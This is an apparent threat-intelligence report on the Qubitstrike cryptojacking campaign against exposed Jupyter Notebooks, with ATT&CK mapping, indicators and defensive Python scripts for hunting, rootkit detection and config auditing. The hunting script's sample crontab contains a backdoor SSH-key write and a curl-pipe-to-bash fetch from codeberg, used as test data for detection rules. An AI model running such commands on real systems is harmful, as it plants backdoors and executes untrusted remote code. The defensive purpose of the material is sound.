Full Report
Qubitstrike is a cryptojacking campaign targeting exposed Jupyter Notebooks, which may allow remote command execution. After obtaining a shell on the remote host, the shell script executes a cryptocurrency miner and establishes persistence using a cron job that inserts a...
Analysis Summary
# Tool/Technique: Qubitstrike
## Overview
Qubitstrike is a cryptojacking campaign that specifically targets exposed Jupyter Notebook environments to gain remote command execution capabilities. Once access is achieved, the campaign deploys cryptocurrency miners, establishes persistence, and installs a rootkit for evasion.
## Technical Details
- Type: Malware Campaign
- Platform: Linux/Cloud Environments (targeting exposed Jupyter Notebooks)
- Capabilities: Remote command execution via Jupyter exploitation, cryptocurrency mining, persistence establishment, rootkit installation, credential theft, and C2 communication.
- First Seen: October 18, 2023 (Publication Date)
## MITRE ATT&CK Mapping
Based on the described activities:
- **TA0001 - Initial Access**
  - T1190 - Exploit Public-Facing Application (Jupyter Notebooks exploitation)
- **TA0002 - Execution**
  - T1059.004 - Command and Scripting Interpreter: Unix Shell
- **TA0003 - Persistence**
  - T1547.003 - Boot or Logon Autostarts: Cron Job
- **TA0005 - Defense Evasion**
  - T1574.008 - Hijack Execution Flow: DLL Search Order Hijacking (Implied by Rootkit use)
- **TA0007 - Discovery**
  - T1087.001 - Account Discovery: Local Account
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer (Downloading miner/rootkit)
  - T1071.001 - Application Layer Protocol: Web Protocols (Discord usage)
*Note: Specific ATT&CK mappings for the Diamorphine rootkit would involve deeper defense evasion techniques.*
## Functionality
### Core Capabilities
- **Initial Access:** Exploiting misconfigured and publicly exposed Jupyter Notebooks to execute remote commands.
- **Resource Hijacking:** Executing cryptocurrency mining software immediately after gaining a shell.
- **Persistence:** Establishing persistence via a cron job that modifies the `.ssh/authorized_keys` file, likely installing a backdoor SSH key.
### Advanced Features
- **Rootkit Deployment:** Capable of retrieving and installing the **Diamorphine rootkit** to hide malicious processes from standard system enumeration tools.
- **Credential Harvesting:** Specifically targets and transmits captured AWS and Google cloud credentials back to the threat actor.
- **C2 Communication:** Utilizes a Python implant communicating via **Discord** as a Command and Control mechanism. Payloads are hosted on `codeberg[.]org`.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Cryptocurrency miner script, Python implant, Diamorphine rootkit files]
- Registry Keys: [Not applicable/Not provided]
- Network Indicators:
  - Hosting infrastructure: `codeberg[.]org` (for payload hosting)
  - C2 mechanism: **Discord bot API/servers**
- Behavioral Indicators:
  - Execution of shell scripts following Jupyter Notebook command execution.
  - Creation/modification of scheduled jobs (cron jobs).
  - Insertion of new entries into `~/.ssh/authorized_keys`.
  - Outbound connections to Discord services for C2.
  - High CPU usage indicative of cryptocurrency mining.
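The behavioral indicators above can be turned into a small hunting script. The following is an added example, not code from the report or from the Qubitstrike campaign: it parses a crontab and a per-flow connection log and flags the three behaviours the page names (a cron entry that appends to `authorized_keys`, a payload fetched from `codeberg.org` and piped into a shell, and outbound flows to Discord hosts). Both inputs are constructed samples; the SSH key, the codeberg path and the Discord hostnames (`discord.com`, `discord.gg`, `discordapp.com`) are placeholders or general knowledge, not indicators taken from the report.

```python
import re

# Constructed sample crontab (not from the report). The key and the URL are
# placeholders; only the *shape* of the entries matters for the detection.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * echo 'ssh-rsa AAAA...PLACEHOLDER' >> /root/.ssh/authorized_keys
@reboot curl -sL https://codeberg.org/PLACEHOLDER/raw/branch/main/PLACEHOLDER.sh | bash
"""

# Constructed outbound-connection log, one flow per line (not from the report).
SAMPLE_FLOWS = """\
2023-10-18T10:01:02Z pid=2211 comm=python3 dst=discord.com:443
2023-10-18T10:01:05Z pid=2211 comm=python3 dst=gateway.discord.gg:443
2023-10-18T10:02:00Z pid=901 comm=apt dst=deb.debian.org:80
"""

# Either an @keyword schedule or five time fields, then the command.
CRON_SCHEDULE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.+)$")

# Heuristics for the cron behaviours described on the page.
CRON_RULES = (
    ("authorized_keys_write", re.compile(r"(>>?|tee)\s*\S*\.ssh/authorized_keys")),
    ("payload_from_codeberg", re.compile(r"https?://codeberg\.org/", re.I)),
    ("pipe_to_shell", re.compile(r"\|\s*(?:ba|z)?sh\b")),
)

# Assumed Discord hostnames; adjust to what your egress logs actually show.
DISCORD_HOSTS = re.compile(r"(^|\.)discord(app)?\.(com|gg)$", re.I)


def scan_crontab(text):
    """Return one finding per cron entry whose command matches any rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = CRON_SCHEDULE.match(line)
        if not match:
            continue
        schedule, command = match.groups()
        hits = [name for name, rx in CRON_RULES if rx.search(command)]
        if hits:
            findings.append({"line": lineno, "schedule": schedule.strip(),
                             "command": command, "rules": hits})
    return findings


def scan_flows(text):
    """Return flows whose destination host is a Discord domain."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        fields = dict(kv.split("=", 1) for kv in parts[1:])
        host = fields.get("dst", "").rsplit(":", 1)[0]
        if DISCORD_HOSTS.search(host):
            findings.append({"pid": int(fields["pid"]), "comm": fields["comm"], "host": host})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']}: {', '.join(f['rules'])} :: {f['command']}")
    for f in scan_flows(SAMPLE_FLOWS):
        print(f"pid {f['pid']} ({f['comm']}) -> {f['host']}")
```

Run it against `crontab -l -u <user>` output for every account (and `/etc/cron.d/*`), not just root, since the campaign keys off whatever user the notebook kernel runs as. A single Discord flow from an interactive Python process is a lead, not a verdict; combine it with the cron and `authorized_keys` findings before escalating.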
## Associated Threat Actors
- Unknown. Evidence suggests a possible connection to Tunisia based on the IP address used to log into a cloud honeypot with stolen credentials.
## Detection Methods
- **Signature-based detection:** Signatures for the specific miner malware and the Diamorphine rootkit.
- **Behavioral detection:** Monitoring for unusual command execution within Jupyter Notebook sessions, the addition of new SSH keys without user context, or suspicious cron job creation that alters the SSH authorized keys file.
- **YARA rules:** [Not provided in the text]
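One behavioral check for the process-hiding capability described above is to compare the PIDs that a directory listing of `/proc` returns with the PIDs that exist when probed by direct path lookup. This is an added example, not code from the report or the Diamorphine project, and it assumes the rootkit hides processes by filtering directory listings (which is what `ps` and `top` rely on) while a direct `stat` of `/proc/<pid>/status` still succeeds. The core logic is kept separate from the `/proc` access so it can be exercised on constructed PID sets.

```python
from __future__ import annotations

import os
from typing import Callable, Iterable


def listed_pids(proc: str = "/proc") -> set[int]:
    """PIDs visible through a directory listing (the view ps/top use)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def pid_exists(pid: int, proc: str = "/proc") -> bool:
    """Direct path lookup; does not go through the directory listing."""
    return os.path.exists(f"{proc}/{pid}/status")


def read_pid_max(proc: str = "/proc") -> int:
    """Upper bound of the PID space on this host."""
    with open(f"{proc}/sys/kernel/pid_max") as fh:
        return int(fh.read().strip())


def find_hidden_pids(listed: Iterable[int],
                     exists: Callable[[int], bool],
                     pid_max: int) -> list[int]:
    """PIDs that exist on probe but are absent from the listing."""
    listed = set(listed)
    return [pid for pid in range(1, pid_max + 1)
            if pid not in listed and exists(pid)]


def hidden_processes(proc: str = "/proc") -> list[int]:
    """Two passes intersected, so processes that start between the listing
    and the probe are not reported as hidden."""
    pid_max = read_pid_max(proc)
    first = find_hidden_pids(listed_pids(proc), lambda p: pid_exists(p, proc), pid_max)
    second = find_hidden_pids(listed_pids(proc), lambda p: pid_exists(p, proc), pid_max)
    return sorted(set(first) & set(second))


if __name__ == "__main__":
    for pid in hidden_processes():
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            comm = "?"
        print(f"hidden pid {pid} ({comm})")
```

An empty result is not proof of absence: a rootkit that also hooks the path-lookup side, or one that hides by a different mechanism, would pass this check. Treat a non-empty result as a strong signal and pair it with the cron and `authorized_keys` checks, plus a `lsmod` vs `/sys/module` comparison, when triaging a suspected Qubitstrike host.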
## Mitigation Strategies
- **Prevention:** Do not expose Jupyter Notebooks directly to the public internet without strong authentication and network segmentation.
- **Hardening recommendations:** Implement robust authentication measures (MFA) for development/notebook environments. Use hardened images and Principle of Least Privilege (PoLP). Regularly audit cron jobs for unauthorized additions. Monitor for the presence of the Diamorphine rootkit components.
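The prevention advice above can be checked mechanically against a Jupyter configuration file. The following is an added example, not code from the report or from the Jupyter project: it parses `c.ServerApp.*` / `c.NotebookApp.*` assignments and reports the settings that turn a notebook server into the exposed, unauthenticated endpoint the campaign looks for, with a weak sample config beside a hardened one. The option names (`ip`, `token`, `password`, `allow_remote_access`, `allow_root`) are real Jupyter traitlets; both sample configs are constructed and the password hash is a placeholder.

```python
from __future__ import annotations

import ast
import re

# Matches lines such as:  c.ServerApp.ip = '0.0.0.0'
ASSIGN = re.compile(r"^\s*c\.(?:NotebookApp|ServerApp)\.(\w+)\s*=\s*(.+?)\s*$")

# Constructed weak config: reachable from anywhere, no token, no password, root.
WEAK_CONFIG = """\
c = get_config()
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.token = ''
c.ServerApp.password = ''
c.ServerApp.allow_remote_access = True
c.ServerApp.allow_root = True
c.ServerApp.open_browser = False
"""

# Constructed hardened config: loopback only, password set (generate the real
# hash with `jupyter server password`), not root. Expose it only behind an
# authenticating reverse proxy or VPN.
HARDENED_CONFIG = """\
c = get_config()
c.ServerApp.ip = '127.0.0.1'
c.ServerApp.password = 'argon2:PLACEHOLDER-HASH'
c.ServerApp.allow_root = False
c.ServerApp.open_browser = False
"""


def parse_config(text: str) -> dict:
    """Collect option -> value for every recognised assignment line."""
    settings = {}
    for line in text.splitlines():
        match = ASSIGN.match(line)
        if not match:
            continue
        key, raw = match.groups()
        try:
            settings[key] = ast.literal_eval(raw)
        except (ValueError, SyntaxError):
            settings[key] = raw  # keep non-literal expressions verbatim
    return settings


def audit_config(settings: dict) -> list[str]:
    """Return one finding per setting that weakens the server's exposure."""
    findings = []
    ip = settings.get("ip", "localhost")          # Jupyter default is localhost
    if ip in ("", "*", "0.0.0.0", "::"):
        findings.append(f"ip={ip!r}: server listens on every interface")
    password = settings.get("password", "")
    if settings.get("token") == "" and not password:   # absent token = random token
        findings.append("token='' with no password: anyone reaching the port "
                        "gets a kernel, i.e. command execution")
    if settings.get("allow_remote_access") is True and not password:
        findings.append("allow_remote_access=True without a password")
    if settings.get("allow_root") is True:
        findings.append("allow_root=True: a compromised kernel runs as root")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{name}]")
        for finding in audit_config(parse_config(cfg)) or ["no findings"]:
            print("  -", finding)
```

Point `parse_config` at the server's actual `jupyter_server_config.py` (or `jupyter_notebook_config.py` on older installs) and remember that command-line flags such as `--ip` override the file, so check the running process's arguments as well.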
## Related Tools/Techniques
- **Diamorphine:** A known Linux rootkit used for hiding malicious activity.
- **Credential Theft:** Techniques related to extracting AWS/Google Cloud credentials from the filesystem.
- **Misconfigured Consul Abuse, Credential Theft, Create SSH Backdoor:** Mentioned as observed techniques within the broader context of the incident.